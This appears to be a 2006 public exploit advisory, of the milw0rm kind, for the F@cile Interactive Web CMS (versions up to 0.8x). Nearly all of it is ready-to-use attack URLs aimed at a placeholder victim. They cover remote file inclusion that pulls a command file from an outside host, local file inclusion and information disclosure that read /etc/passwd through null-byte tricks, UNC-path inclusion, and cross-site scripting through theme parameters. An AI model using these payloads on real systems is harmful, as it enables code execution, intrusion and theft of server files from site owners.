F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com This exploits works on F@cile Interactive Web <= 0.8x Original advisory can be found at: http://www.nukedx.com/?viewdoc=35 File Inclusion Vulnerabilities. http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt? http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00 http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5 http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5 http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00 Cross Site Scripting. http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS Information disclosure http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00 # nukedx.com [2006-05-27] # milw0rm.com [2006-05-28]